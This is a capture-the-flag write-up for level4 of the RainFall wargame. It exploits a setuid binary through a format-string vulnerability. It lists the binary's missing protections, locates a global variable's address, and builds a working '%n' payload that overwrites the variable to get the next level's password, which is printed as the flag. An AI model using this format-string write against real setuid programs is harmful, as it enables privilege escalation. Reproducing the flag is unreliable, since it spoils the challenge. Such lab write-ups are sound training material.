After login we see next information:
```
  GCC stack protector support:            Enabled
  Strict user copy checks:                Disabled
  Restrict /dev/mem access:               Enabled
  Restrict /dev/kmem access:              Enabled
  grsecurity / PaX: No GRKERNSEC
  Kernel Heap Hardening: No KERNHEAP
 System-wide ASLR (kernel.randomize_va_space): Off (Setting: 0)
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
No RELRO        No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   /home/user/level4/level4
```

Command: `ls -l`
```
total 8
-rwsr-s---+ 1 level5 users 5252 Mar  6  2016 level4
```

Using `objdump` and `radar` tools find out that there are three functions inside `main`, `n` and `p`.  
![alt text](./Resources/main.png "main function")  
![alt text](./Resources/n.png "n function")
![alt text](./Resources/p.png "p function")

Here the same vulnerability as in the previous level, with one small modification - we need to assign `0x1025544` value `m`. As there is a limitation by the buffer, only `0x200`, I will print additional value with value precision.

Using `objdump` or `gdb` to find address of `m` variable - `0x8049810`. Put this address inside format string and find its address on the stack.  
```
level4@RainFall:~$ python -c 'print "\x10\x98\x04\x08" + "%x " * 12 ' > /tmp/my
level4@RainFall:~$ cat /tmp/my | ./level4 
b7ff26b0 bffff684 b7fd0ff4 0 0 bffff648 804848d bffff440 200 b7fd1ac0 b7ff37d0 8049810
```

Prepare final payload. `python -c 'print "\x10\x98\x04\x08" + "%.16930112x" + "%12$n" ' > /tmp/my`

Exploit
```
level3@RainFall:~$ cat /tmp/my - | ./level4
...
... 
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b7ff26b0
0f99ba5e9c446258a69b290407a6c60859e9c2d25b26575cafc9ae6d75e9456a
```
Flag: `0f99ba5e9c446258a69b290407a6c60859e9c2d25b26575cafc9ae6d75e9456a`